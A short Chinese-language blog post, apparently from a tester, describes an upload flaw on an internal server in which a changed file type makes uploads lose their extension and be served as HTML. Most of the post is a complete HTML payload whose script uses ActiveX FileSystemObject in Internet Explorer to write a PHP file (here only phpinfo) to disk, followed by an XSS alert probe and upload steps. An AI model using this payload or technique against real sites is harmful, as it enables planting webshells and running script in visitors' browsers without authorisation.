XSS写入一句话
今天测试公司内部服务器,发现一个很有意思的问题,在提交图片时,修改文件类型,导致上传的文件丢失后缀,经过测试,默认解析html。
构造payload-html文件
<!DOCTYPE html>
<html langd="en">
<head>
<meta charset="UTF-8">
<title>Security testing</title>
</head>
<script>
//获取对象
var fso = new ActiveXObject("Scripting.FileSystemObject");
//创建文件
var f=fso.Createtextfile("./a.php",2,true);
//写入内容
f.writeLine("<?php phpinfo();?>");
//关闭流
f.close();
</script>
<body>
<h2>This is a friendly interface</h2>
<script>alert("Welcome to")</script>
</body>
</html>
传输img替换成html文件
浏览器测试IE<=11,环境中为img,不解析php文件,思路大致这样。
还不快抢沙发